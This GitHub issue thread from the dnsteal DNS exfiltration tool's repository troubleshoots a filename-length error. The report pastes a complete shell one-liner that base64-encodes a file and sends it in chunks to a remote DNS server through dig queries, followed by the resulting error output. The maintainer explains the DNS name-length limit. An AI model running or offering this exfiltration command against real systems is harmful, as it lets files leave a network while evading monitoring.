### ISSUE TITLE
Error when sending data from client: "not a legal name (ran out of space)"

### ISSUE THREAD

**Issue by ghost** [m57/dnsteal#10]
Do you know why I am seeing the error below when transferring a file from the client? Some of the file makes it to the server but not all of it.

I am able to transfer a file named hello.txt with a simple line of text inside it: "Hello"

I experience this issue when attempting to transfer other files that have a bit more text inside.

user01@recon02:~/dnsteal$ f=the_boy_who_lived.txt.gz; s=4;b=57;c=0; for r in $(for i in $(base64 -w0 $f| sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @domainname.com `echo -ne $r$f|tr "+" "*"` +short; done
dig: 'H4sICOgjklgEAHRoZV9ib3lfd2hvX2xpdmVkLnR4dACNXcmS40QQvTvC/-.yD6Yohw9wfAgWBn2IM1OMpW2RYtS0bLGPP1vPcyq0pyNwQBM922pFpyz5-.dZmi/Lvr8VP3TjGPqibKtiPIXip67fhz70m6H4aezasF7xv0**/OiHnz/-.7sfj*u8/48ecvPys*/v734rcvvy**efPrZ5/yy2/7J43ybT88FZ9O/dCE-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '27boDkU7nXeY4dBN/bb4oa/fhrH4lD*2xRVTFZe*mzB5Vwzlbb0aT*XIl-.dz8YugPYT82t6Lt*nPZbHGtbJ*LWzcVbwPWf572p6fi5/iANtGUw7heXU-.J3aQLv3FRF*OuCYTjLLhR1*7Zr3oYKv2DJt/FUt8diGPuyPYai64vzbQB-.N6m4atuvVLuzLaQi2pj*mYSyqumo3Y3Hqmqq41uOpGLAGrK8dAv5/MmI4-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'DbiscuDDeKzHEjA8aFIWh7o/F/uyabCML/qpbbGGARQ51RjrXFagfNXXT-.QNifhk4Bp7Z1cct1h8ON9zR2tynsq*aG7dRtGH/vC3KZjx10xFXOGW1Xp-.3KtwEPi1pN2WOLZ*yi3J/CU2ZWXmjdio27pmurwF8xBUZpQ9ljnvFa743-.I0zCVTVGeu6kdsSXN7uvHvs6kss0J4h0m3DkUwwm7Gi4BDwydOMcHTxCO-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'scYDezCAnOje4psj9hXa4hDafQBdhstNl1rOzdXUx9Ou6wexPu5g4FKx1-.eEMumKK1gmM6xUuazO1Rqj79aq71G1tA/ZG4bYDW1pMvutE0SuuGD9fTB-.KwRhMcF9ayHUMF7kwuvWUzdHE5Yd*Hccvp1ytOjt31oRwDZOkAsjrhS1L-.lHHZdheG6qanAvmEvYtSjibiLHkbBzM820V637jAObivqAxcOxaW*Ybsd-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '1lPuOluVK/sgvmNf*qjpF4KwAadqakDeDnYimT8HLBkiPHD/YP8N0w4fr-.Fc1OFXux*1SoC7YdoAUVeR8VBsTxzRDVK9TAEvsSxM6ykDXVY*Y7rHtjN-.Snadjhomk6Vj21PlU9nPi5HrkZqH43DPWuCabvSxnBWqaqwgCyOUbIqxu-.dIsmVcQArKm*g6Zx4RdnTeEVJot0IYbyb47kN1yKaskjoF*K5xQq6JZGx-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'AjIcf7UgMv461WeOXQ8UyvVKhgDkiOQpIEgYSUx5DuECKi0Xey1vH*CbJ-.DuS1PXKNeJc/4UnZEmwsP2phig19XPQ2iX5v52wiNdsOyiE*6aL62RRTU-.2zhWCDYD9PYajwExYf5Ol6rBsGpx*H7UzZIk*zdO6bboLsD898chzqSvw-.bpuMRmqIVYRyz0lpNNtOFhnKmgbJY0i6AnBfYGs3RNLIqxo09TVZ/oxbk-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '3Zym8xlMxcKwkku9fw6mPKT8ucP8kAoRtw4kNjjR9c/bl1Q5UvQueJiU1-.xLq5mbGD/vusZMmSAj24NwZIyZe1O3YaboTZBC8KOteHPiO2txJBs*kWr-.3nAGbKQdDy2oJe16Y4NJPU*VKSWpytbqvuqjE*ot41B7tGGR*38937hsl-.NSVpfh8O*HDD8JfCC2wu/O3IcHiQ4CUY8IX16rofBza2p7*4WJOBnXAhV-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '9qd*k4vClWZBnMKGwJzp7BFJ313xtVbFuIQeR5ujJsg5PnxTjyM1/fYct-.g9YU9eTwvPdOVObcNCjcNyYn24VK4RIJbrvy95cXxm5fxe*wDBW1H2R9I-.1sTaJF18Nx8P5sE8wA4KMzjZfo98GCoT62uHm9osWX8JLSU1NjCY*PVEU-.8ie1WRpNzeXkqPu96cyZwzAvurVeu2qRP/TcYb/PSnsiIYEjO3fK7P0KP-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'zZmcYXxYM2gDWbdeNV33XJTHsm5hcaKeiiO73U0rGsAcLunFrj2ug4jwp-.5u0OASWZnuAiHPnJ1jL37BEc1220LeQEqzU7LG0ojt8WLwZFavk61xND1-.mNhG402oLZuwYjYIdYqZkd/u4GBjaNY*pb4/NT8dGweLzqYSicKiZotkm-.MR/3QOH1XggMnbm6EElRxcOzP7EXd913PqaJ4r1fOTN4q7rvDL*tqEROT-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'VS18Ankh3o/piQ84xSDz1UR2VyQrhLDXHcOSEkdQjf5jCM2BBsMUZTiVz-.8Goc5kSXVzaffltJbrgkpFj7K4Ix/hDMmQB5igBjmY8/LUPlzHaJayoMs-.GwINaIhR*deaiuOEb9gKOQPn08jVGsQsURDppv6yPI55v6tfeLLSCeSZH-.Wq9AMIa5/MK7kgPUMbmoJfXk41Pvij/IsVkaq4vfmom3Ve*NX6aJMVYKL-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'sJiCG*20CPdIDUUn0MYVlnisV/JsT8UP*ohV0MGVz0smpXkVwdmjVOAuj-.obn1qsD8oMbH8dCBtdmUnC6DMxvsMsraMdf26OP8Q7t2zBdEApxzSCVgg-.fSCd/jSQgeg5RDOZwQBdMcYkpzgrgZdgqb6pN9g6cNvah7hdVvID92W7g-.F3BvoX6mcDK2a6K0GbATBbtUN2XD8OdUjdarBssC2eeZ2xXhI91yYcFvF-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'fKM7BlJ/QTQL8kLbl0fxg5wxRpWk5yWt4KyRQV0nDe9omg8w1W2rB5hHM-.UOKXO0aiK1STJdYuTeMUmpd*DqcGfhWj0dYeOfoO8XPlpP0bzkxVe6dAu-.JsNrceKSLT/nm*A00urnASpsC7cteYFDMMbvj7yMzq8dFI6Ww1UnW7twx-.7GopP0yCrxOIYlWQteHqCUoE3vs2rJwkxk0jif*7e0tVZzleCk1dq1ITc-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)

**Comment by ghost** [comment]
It worked just fine after I changed the file name to something shorter, test.gz. Thanks

**Comment by m57** [comment]
Yes if you read the readme, there is a limit on file names, if you want to increase the filename size, then read the help of the tool, you can specify subdomain byte lengths. This isnt recommended as you can lose efficiency, but it is a limitation of the DNS protocol as the entite hostnane must be less than x bytes. Glad you have sorted it now :)

**Comment by ghost** [comment]
Thanks!
